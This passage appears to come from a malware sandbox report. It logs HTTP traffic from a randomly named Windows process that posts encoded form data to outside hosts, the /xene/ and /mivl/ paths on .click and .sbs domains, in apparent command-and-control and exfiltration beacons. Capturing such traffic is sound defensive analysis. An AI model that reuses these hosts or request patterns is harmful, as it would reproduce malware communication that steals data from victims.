href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 7, 2024 08:10:48.687879086 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTJiNGVjZjEtZjZiYS00ZDc4LWJkZTQtZTIwZGYyNmY4NDkzIiwicGFnZV90aW1lIjoxNzMwOTYzND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50025	199.59.243.227	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:50.599750042 CET	10801	OUT	POST /xene/ HTTP/1.1 Host: www.adsdomain-195.click Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.adsdomain-195.click Referer: http://www.adsdomain-195.click/xene/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 6c 53 33 47 75 36 55 41 35 6b 30 46 58 72 30 6b 52 56 43 4e 67 35 70 78 6d 32 63 4c 73 7a 41 66 78 54 42 56 69 49 42 4e 4e 6a 37 74 36 78 55 53 61 2f 31 66 73 62 33 78 79 42 55 50 4d 6d 70 31 37 30 6e 68 2f 41 6b 4e 48 35 57 59 41 67 30 54 64 4f 68 31 64 34 56 47 46 6b 55 49 7a 72 57 71 70 79 67 52 53 6d 67 4e 7a 52 74 46 74 78 47 34 73 76 55 66 44 68 6b 5a 48 68 69 6c 35 34 4c 36 62 73 72 4d 2b 37 73 4d 72 6f 38 4d 47 69 4c 31 71 76 43 44 58 51 76 53 4f 7a 69 38 67 79 41 4b 57 71 6a 46 4f 35 49 48 69 34 70 6f 55 67 69 6e 58 7a 6a 72 37 70 6f 59 74 4d 6f 66 4b 47 32 36 43 65 4f 62 69 70 6c 57 73 5a 65 42 57 31 6b 2f 71 66 65 43 6f 31 55 49 32 43 37 77 32 65 6c 62 35 69 35 78 50 4e 5a 39 49 4f 75 53 52 65 6e 64 36 71 6f 31 71 77 52 6d 5a 72 4c 61 56 31 2b 47 6d 50 78 6c 54 6f 5a 73 58 7a 61 2f 41 4f 32 4c 4a 36 51 51 49 75 42 4d 36 4b 72 47 6f 2b 4b 76 59 41 41 76 76 2b 34 41 66 61 6a 49 36 76 42 63 39 41 65 70 33 6e 78 44 31 6f 2b 38 6f 73 63 69 75 69 58 76 33 4e 38 2f 4d 58 [TRUNCATED] Data Ascii: NbcPAHe=lS3Gu6UA5k0FXr0kRVCNg5pxm2cLszAfxTBViIBNNj7t6xUSa/1fsb3xyBUPMmp170nh/AkNH5WYAg0TdOh1d4VGFkUIzrWqpygRSmgNzRtFtxG4svUfDhkZHhil54L6bsrM+7sMro8MGiL1qvCDXQvSOzi8gyAKWqjFO5IHi4poUginXzjr7poYtMofKG26CeObiplWsZeBW1k/qfeCo1UI2C7w2elb5i5xPNZ9IOuSRend6qo1qwRmZrLaV1+GmPxlToZsXza/AO2LJ6QQIuBM6KrGo+KvYAAvv+4AfajI6vBc9Aep3nxD1o+8osciuiXv3N8/MXYV4VlTKe4wgQdVAtlddiGkcebd4/dussfvGyq04f8NsTzhnvmHs2MMcU5l3699+HUsN0mN26DiH/dQaRFaB4Pr2q0jBommMvlSX8CuBkk+fiSXJpnGQcG0TRWXar/3+l4hdBZo7tx4/i6StUPvrELoiFsA/8tbn1EbsPtfyHS9BlHVM8GFzGN24qKKFCFSVDxyFMjmq7KOZKn+3QpDSII1lZpR4Hm3T//R181ZV2lP96WZwuB8EnEb0lI1BdH8AaIJL2gkL/Ieuw/V1DaXQER4XpYrl9mUCX264JTEg+rYww8UwOPLEsxaI/tShxB2ksD2yRbOm3B9ckEAUH9KQip8tJv9oanLOemT8+QT3zwdm593+FiGXsQal2RzEKpcXXZRu9OobD1dxvuscvOOikzrACCgNQXoSqvcQpepv4qIO4plLJSbIm7A0mq+9GPG9XpIYLWXkCBnmXc8vkw0QVT/wOMG+0oj/c1u+Di/2jSFMT4xCf2BwGUzcQoSoEuyoZxcjos+eDe2d/vt1pdrgrtKmex4Nn1v8ISz0WCSNEnD1mcJwSupQv3bX07i7Q+VUrrXNpz2rXbzSMjiDV3Uzxt77wXCUx40MKtwUtg6clYSnOAEK5Nvj0qkrWvaHGPfjobCDENH8QLwBkf/qq+bXuRrw1gC1emX85zS [TRUNCATED]
Nov 7, 2024 08:10:51.213530064 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 07 Nov 2024 07:10:50 GMT content-type: text/html; charset=utf-8 content-length: 1146 x-request-id: b30605ee-0c08-423d-95ab-c8d38c590812 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g== set-cookie: parking_session=b30605ee-0c08-423d-95ab-c8d38c590812; expires=Thu, 07 Nov 2024 07:25:51 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6e 6a 78 64 30 77 34 42 31 73 6c 73 42 4f 35 59 36 36 78 4f 33 6c 4e 37 41 4e 2b 35 59 57 7a 35 56 65 76 58 76 46 4e 62 6a 68 44 37 42 72 34 65 6f 2f 4b 54 73 6e 2f 56 45 36 6a 73 38 70 56 61 52 59 77 52 4b 4b 47 7a 2f 50 64 43 72 79 53 6a 2f 55 4f 42 32 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_njxd0w4B1slsBO5Y66xO3lN7AN+5YWz5VevXvFNbjhD7Br4eo/KTsn/VE6js8pVaRYwRKKGz/PdCrySj/UOB2g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 7, 2024 08:10:51.213546038 CET	599	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjMwNjA1ZWUtMGMwOC00MjNkLTk1YWItYzhkMzhjNTkwODEyIiwicGFnZV90aW1lIjoxNzMwOTYzND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50026	199.59.243.227	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:53.146644115 CET	414	OUT	GET /xene/?9Pj=rz_D&NbcPAHe=oQfmtMAR504qWoErGCutl7x0yVR6q2g71CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEqUzXVZ73JGOh0p0dB8KyypZzDeumOcFOmM= HTTP/1.1 Host: www.adsdomain-195.click Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:10:53.802922010 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 07 Nov 2024 07:10:53 GMT content-type: text/html; charset=utf-8 content-length: 1462 x-request-id: 3f80dd68-5354-4f3b-822d-2d7385ddd7aa cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cGO7yfGYkzy/adHcBlGoSUP+woD+v9+Z7ZzkSylOU/4Tvt3XPpHdzp28EEcNSXQwjmRUK2u++L1v4sUGz2I8VA== set-cookie: parking_session=3f80dd68-5354-4f3b-822d-2d7385ddd7aa; expires=Thu, 07 Nov 2024 07:25:53 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 63 47 4f 37 79 66 47 59 6b 7a 79 2f 61 64 48 63 42 6c 47 6f 53 55 50 2b 77 6f 44 2b 76 39 2b 5a 37 5a 7a 6b 53 79 6c 4f 55 2f 34 54 76 74 33 58 50 70 48 64 7a 70 32 38 45 45 63 4e 53 58 51 77 6a 6d 52 55 4b 32 75 2b 2b 4c 31 76 34 73 55 47 7a 32 49 38 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cGO7yfGYkzy/adHcBlGoSUP+woD+v9+Z7ZzkSylOU/4Tvt3XPpHdzp28EEcNSXQwjmRUK2u++L1v4sUGz2I8VA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 7, 2024 08:10:53.802994013 CET	915	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2Y4MGRkNjgtNTM1NC00ZjNiLTgyMmQtMmQ3Mzg1ZGRkN2FhIiwicGFnZV90aW1lIjoxNzMwOTYzND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50027	163.44.176.12	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:59.447422028 CET	672	OUT	POST /mivl/ HTTP/1.1 Host: www.broork.sbs Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.broork.sbs Referer: http://www.broork.sbs/mivl/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 41 41 70 39 6e 75 73 72 37 43 44 4d 6f 4d 52 77 56 58 46 75 4d 38 75 2f 6b 56 6d 56 37 54 6c 2f 64 65 34 41 43 42 73 58 6e 45 78 67 58 30 36 63 69 4d 72 57 43 78 74 62 61 75 79 47 46 61 31 4c 55 35 41 48 76 6e 38 58 6b 73 33 48 6e 72 51 4e 63 48 4a 6c 56 66 79 31 6c 73 5a 71 35 34 62 77 65 6e 50 4d 53 4b 6c 63 53 55 6d 44 46 75 62 38 63 74 72 50 50 69 47 77 65 4a 44 4f 30 55 57 2b 4e 42 34 6b 75 39 72 4a 70 4b 2b 58 4a 44 39 6f 7a 75 77 71 50 44 70 33 57 4e 51 2b 68 59 71 6d 6e 78 45 38 36 78 49 49 7a 62 33 58 57 61 6e 54 53 6e 45 6f 31 51 72 31 42 69 42 55 76 4b 77 55 41 41 3d 3d Data Ascii: NbcPAHe=AAp9nusr7CDMoMRwVXFuM8u/kVmV7Tl/de4ACBsXnExgX06ciMrWCxtbauyGFa1LU5AHvn8Xks3HnrQNcHJlVfy1lsZq54bwenPMSKlcSUmDFub8ctrPPiGweJDO0UW+NB4ku9rJpK+XJD9ozuwqPDp3WNQ+hYqmnxE86xIIzb3XWanTSnEo1Qr1BiBUvKwUAA==
Nov 7, 2024 08:11:00.320949078 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 07 Nov 2024 07:11:00 GMT server: LiteSpeed vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
Nov 7, 2024 08:11:00.320987940 CET	271	IN	Data Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50028	163.44.176.12	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:01.993752956 CET	692	OUT	POST /mivl/ HTTP/1.1 Host: www.broork.sbs Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.broork.sbs Referer: http://www.broork.sbs/mivl/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 41 41 70 39 6e 75 73 72 37 43 44 4d 72 74 68 77 58 77 52 75 4c 63 75 38 68 56 6d 56 69 44 6c 7a 64 65 6b 41 43 45 63 48 6d 79 70 67 58 56 4b 63 6a 4e 72 57 4c 68 74 62 52 4f 79 48 49 36 30 4a 55 35 38 50 76 69 45 58 6b 6f 66 48 6e 71 67 4e 64 77 6c 6d 54 66 79 33 75 4d 5a 73 6b 49 62 77 65 6e 50 4d 53 4b 68 36 53 55 75 44 43 66 72 38 65 49 48 4d 51 53 47 7a 64 4a 44 4f 2b 45 57 36 4e 42 34 57 75 2f 65 73 70 4d 36 58 4a 47 42 6f 79 2f 77 70 57 7a 70 4c 59 74 52 4a 78 36 79 70 69 43 6c 76 6e 51 45 51 78 2f 6a 79 61 38 71 4a 44 57 6c 2f 6e 51 50 47 63 6c 49 67 69 4a 4e 64 62 43 56 74 37 59 67 4e 6c 6b 48 4a 49 7a 34 6a 36 46 43 4f 2b 63 45 3d Data Ascii: NbcPAHe=AAp9nusr7CDMrthwXwRuLcu8hVmViDlzdekACEcHmypgXVKcjNrWLhtbROyHI60JU58PviEXkofHnqgNdwlmTfy3uMZskIbwenPMSKh6SUuDCfr8eIHMQSGzdJDO+EW6NB4Wu/espM6XJGBoy/wpWzpLYtRJx6ypiClvnQEQx/jya8qJDWl/nQPGclIgiJNdbCVt7YgNlkHJIz4j6FCO+cE=
Nov 7, 2024 08:11:02.894866943 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 07 Nov 2024 07:11:02 GMT server: LiteSpeed vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
Nov 7, 2024 08:11:02.894884109 CET	271	IN	Data Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50029	163.44.176.12	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:11:04.557389021 CET	10774	OUT	POST /mivl/ HTTP/1.1 Host: www.broork.sbs Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.broork.sbs Referer: http://www.broork.sbs/mivl/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 41 41 70 39 6e 75 73 72 37 43 44 4d 72 74 68 77 58 77 52 75 4c 63 75 38 68 56 6d 56 69 44 6c 7a 64 65 6b 41 43 45 63 48 6d 79 52 67 58 6e 79 63 69 71 66 57 52 68 74 62 50 2b 79 43 49 36 31 52 55 35 55 4c 76 69 41 39 6b 71 58 48 6c 4d 55 4e 55 69 64 6d 47 76 79 33 68 73 5a 74 35 34 62 66 65 6a 72 41 53 4b 78 36 53 55 75 44 43 63 7a 38 5a 64 72 4d 53 53 47 77 65 4a 44 53 30 55 57 43 4e 41 51 73 75 2f 4c 5a 6f 38 61 58 4f 6d 78 6f 78 4e 6f 70 65 7a 70 4e 66 74 52 52 78 36 50 70 69 43 4a 6a 6e 52 41 71 78 34 4c 79 4c 49 62 33 5a 6b 52 58 79 32 62 6b 4b 6e 35 43 75 4f 6c 64 62 7a 64 54 39 5a 77 36 32 77 54 58 46 68 68 72 67 55 65 74 72 4d 44 38 55 74 6a 46 4c 38 6c 49 46 47 46 41 44 50 49 64 32 48 50 46 6a 69 34 77 56 72 41 33 75 7a 4f 5a 47 67 43 44 78 38 47 48 75 77 74 46 68 53 36 59 46 71 56 49 7a 4a 38 35 36 30 55 79 59 2f 45 39 74 53 6b 75 33 61 76 46 56 67 73 31 52 6e 45 4e 37 54 69 71 76 74 69 63 73 38 78 58 42 75 79 6f 74 45 79 35 42 64 35 49 44 58 54 76 46 4e 74 4e 64 46 [TRUNCATED] Data Ascii: NbcPAHe=AAp9nusr7CDMrthwXwRuLcu8hVmViDlzdekACEcHmyRgXnyciqfWRhtbP+yCI61RU5ULviA9kqXHlMUNUidmGvy3hsZt54bfejrASKx6SUuDCcz8ZdrMSSGweJDS0UWCNAQsu/LZo8aXOmxoxNopezpNftRRx6PpiCJjnRAqx4LyLIb3ZkRXy2bkKn5CuOldbzdT9Zw62wTXFhhrgUetrMD8UtjFL8lIFGFADPId2HPFji4wVrA3uzOZGgCDx8GHuwtFhS6YFqVIzJ8560UyY/E9tSku3avFVgs1RnEN7Tiqvtics8xXBuyotEy5Bd5IDXTvFNtNdFszy5NSAb7RkGo2nP4HPSFkOwr6ty2mV6uctEXM+N+A52VhouGYmfwXYG6kmfHjiRDza5IuqDQriJGZsiX9tJANVBx8zZIvBWqhW8YB7fBZvJQUeF5Cpk8FXrT2qkW66NgOXOUz7PDgg+9wimfwCrxyQi5Dlpi69FRmld3OPkdkqYzVKScMmbfDOWDi25VtxFJLQDNelc5QeoC15sY+C3iX1y9jFaHGpH5wqdwdHK+k3vzTfIcbGaaUWkgI/TO6AhEkrHut8XC8O/zCzRY++ac/EE8PH+qO8WaoqCsx23BdvQ/0It3/+2aOlNAsC3v3FsDKY2IqIIF+CUJ2oQ9fjGKFrhypk4l16l2CaJPYkApAD52ZjuywkB+I9CsTeIMIyCk0sUD2IC0Q02fIYMB5YwfM3asbJEqcnyKOrbyXRwfLcNn/Bj6NpxdNB6yRTXhO/HaFpTESs+7b6DzzjMen8Jrf7Sz5apc7ENQva4f7X0a5JUoCUU9JnpnoVygKNX1qt4UV6Qz5nUmJ+cjugmwAitTYbVAqNcpJ6Eot5LMljk1I33H7X9lq2